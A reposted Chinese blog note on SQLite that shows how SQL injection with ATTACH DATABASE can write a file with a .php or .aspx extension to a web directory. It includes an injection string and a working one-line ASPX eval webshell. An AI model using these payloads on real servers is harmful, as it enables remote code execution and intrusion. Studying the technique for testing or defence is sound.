SQLite扫描

最新推荐文章于 2022-06-22 19:50:31 发布
最新推荐文章于 2022-06-22 19:50:31 发布
阅读量121 收藏
点赞数
文章标签: 数据库 php
原文链接:http://www.cnblogs.com/NBeveryday/p/11309895.html
版权

SQLite的扫盲

  1. SQLite的是一种嵌入式数据库,它的数据库就是一个文件。由于SQLite的本身是Ç写的,而且体积很小,所以经常被集成到各种应用程序中,主要在手机的应用中使用。
  2. 之前没有遇到过关于SQLite的的注入,这次遇到一个在ASPX中使用的SQLite数据库,并且存在注入。
  3. SQLite的一个重要的特性是零配置的,这意味着不需要复杂的安装或管理。
  4. SQLite的的语法和其他数据库差不多,只不过的SQLite的数据库是一个单独的文件.SQLite创建数据库的方法有两种,一种是创建,另外一种是附加。
  5. 创建使用命令:sqlite3.exe 数据库文件名。例如创建一个名字为aa.db的数据库,使用命令:sqlite3.exe aa.db。
  6. 例如附加一个bb.db的数据库,别名为a,命令为:attach database 'd:\sqlite\bb.db' as 'a';。

  7. 创建表并插入数据的命令如下:

     create table a.tt(dataz text); INSERT into a.tt(dataz) VALUES ('test');

  8. SQLite还可以生成任意后缀名的数据库文件。例如创建一个php结尾的数据库文件,新建一个名为exp的表,并在其中插入数据,内容为:<?php phpinfo();?>

    具体命令:

    sqlite>ATTACH DATABASE 'd:\\sqlite\\23.php' AS test ;create TABLE test.exp (dataz text) ; insert INTO test.exp (dataz) VALUES ('<?php phpinfo();?>');--

  9. 同样的方法生成aspx后缀的数据库文件,创建表,并插入<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>。然后将该文件放在IIS服务的web目录。发现其中的APSX代码也会被解析。

  10. 通过以上的测试过程和实际利用,可以归纳两点:

  11. SQLite可以创建任意格式的数据库文件,并且插入的代码可以根据文件格式来解析,这就造成了可以利用这种方式写WEBSHELL的原因。
    2.SQLite中十六进制的写法为:x'....',而不是0x....。

参考:https://fuping.site/2017/07/19/SQLite-Injection-Get-WebShell/

转载于:https://www.cnblogs.com/NBeveryday/p/11309895.html

weixin_30897079
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SQLite3性能优化
07-16
SQLite 性能优化 空间释放、磁盘同步、Cache大小等
Redis的命令登录和database切换操作
weixin_39249427的博客
11-02 2214
Redis的命令登录和database切换操作 cmd本地登录: 配置文件:requirepass 123456 127.0.0.1:6379> auth 123456 OK redis的database Redis默认提供了16个数据库(database),每个数据库有一个id,从0到15,他们没有名字,只有id, 不同的数据库中数据隔离保存。 配置文件中修改数据库个数,启动时提供32个数据库: databases 32 用select id命令可以切换当前数据: 127.
SQLite3调测优化
chenliang0224的专栏
07-16 782
非常好的一篇博客,详见:https://blog.csdn.net/lijinqi1987/article/details/51852721 首先,建立数据库 rc = sqlite3_exec(db, "create table if not exists testinfo (id integer primary key, age integer, height text, weight ...
sqlite3性能优化方面的配置
kv110的专栏
06-17 1704
sqlite3性能优化方面的配置
M3扫描控件源代码及SQLite
11-22
M3pda扫描条码控件及把数据以SQLite数据保存
SQLite大全
01-02
android-database sqlite3-基础教程 sqlite3使用详解 SQLite权威指南 ...扫描SQLite入门与分析 SQLite数据库文件格式全面分析 The Definitive Guide to SQLite The Definitive Guide to SQLite Second Edition
SQLite权威指南 第2版_12914460 超级高清扫描
12-20
SQLite权威指南 第2版_12914460 超级高清扫描
SQLite权威指南(第二版).Grant.Allen.扫描版.pdf
04-24
这是一本关于sqlite 起源、特性、简介、使用、深度解析的书。
路由器密码扫描routerscan
02-15
本软件善于寻找和确定不同的设备,发现大量已知的路由器或服务器, 最重要的是把其中有用的信息,特别是无线网络的保护方法的特点: ...(关于广域网的连接也方便获取信息时,扫描局域网)和输出的牌子和路由器型号。
SQLite3的性能优化
11-11
主要讲述在嵌入式中使用SQLite3时,对相关的数据库的性能如何优化的问题
Sqlite3写性能优化-每秒百万条写入
因热爱而执着,因执着而成功。
06-22 3113
最近项目中使用到了Sqlite3来保存结果数据,大约100万条数据,插入到sqlite数据库中竟然耗时5分钟,这在真个数据处理流程中占用了太多的时间,是不可接受的,那么如何优化sqlite的写数据的性能呢?优化方式 通过查阅资料和其他大牛们的博客,确定有几个点可以尝试:关闭写同步,PRAGMA synchronous = OFF,在 sqlite3 中 synchronous 有三种模式,分别是 FULL,NORMAL 和 OFF,在系统意外终止的时候,安全性逐级减弱,FULL模式下,保证数据不会损坏,安全
SQLite 性能优化
hanbo79的专栏
10-18 1505
提升SQLite数据插入效率低、速度慢的方法_majiakun1的专栏-CSDN博客 前言 SQLite数据库由于其简单、灵活、轻量、开源,已经被越来越多的被应用到中小型应用中。甚至有人说,SQLite完全可以用来取代c语言中的文件读写操作。因此我最近编写有关遥感数据处理的程序的时候,也将SQLite引入进来,以提高数据的结构化程度,并且提高大数据的处理能力(SQLite最高支持2PB大小的数据)。但是最开始,我发现,直接使用SQL语句的插入效率简直低的令人发指的。后来不断查文档、查资料,才发现了一条
sqlite3性能优化要点
weixin_30641999的博客
06-10 152
Put inserts/updates in a transaction将插入语句和更新放到一个transaction里 Playing with page sizes makes a difference as well (PRAGMA page_size). Having larger page sizes can make reads and writes go a bit faste...
sqlite3大量数据插入优化
weixin_44896359的博客
07-24 2082
sqlite3插入十万百万行级的数据的过程优化 背景前提:客户需要导入excel文档存入数据库进行操作,每月大约在2W行左右,文件格式为xlsx。在最开始插入语句是用StringBuilder来把DataTable中的数据拼成一个超级长的sql语句,在开始执行的时候直接卡死,电脑资源跑满,磁盘读写100%(此时的数据只有1.5万行),而且执行数据库操作的有事务操作,但依然卡死。 最开始的代码: ...
二维码和相片在SQLite中的图片保存和查询
lifeijiyuan的博客
04-23 171
http://www.eoeandroid.com/forum.php?mod=viewthread&tid=164587&extra=page=1 本帖最后由 huaxiannv 于 2012-4-2 21:30 编辑 本文参与:eoe & 友盟Android开发原创教程大赛 二维码和相片在SQLite数据库中的图片保存和查询 整体的工作流程如下: 保存流程: ...
SQLite性能优化实践
chenaimanhua的专栏
06-18 1110
背景 项目在小型服务器上需要使用到SQLite,在默认配置下(以下数据均在4C16G,SSD环境测试),会出现以下瓶颈。 SQLite的写性能大概在100-200TPS,这样的写性能对服务器(哪怕是4g内存)来说也显得不够看。 并发能力不足,经测试并发量在10QPS以上就会概率性database is locked。 当遇到database is locked的异常信息,sql...
sql中 vacuum命令:回收空白空间,减少数据库大小
阳光柠檬_的技术笔记
04-11 9597
The VACUUM command rebuilds the entire database. There are several reasons an application might do this: 1. Unless SQLite is running in “auto_vacuum=FULL” mode, when a large amount of data is deleted
sqlite数据库磁盘映像错误
最新发布
05-12
3. 使用病毒扫描软件扫描计算机以确保计算机没有受到病毒或恶意软件的感染。 4. 如果以上方法都无法解决问题,可以尝试使用第三方工具进行修复。例如,可以使用 SQLite Recovery 工具或 SQLite Database Recovery ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值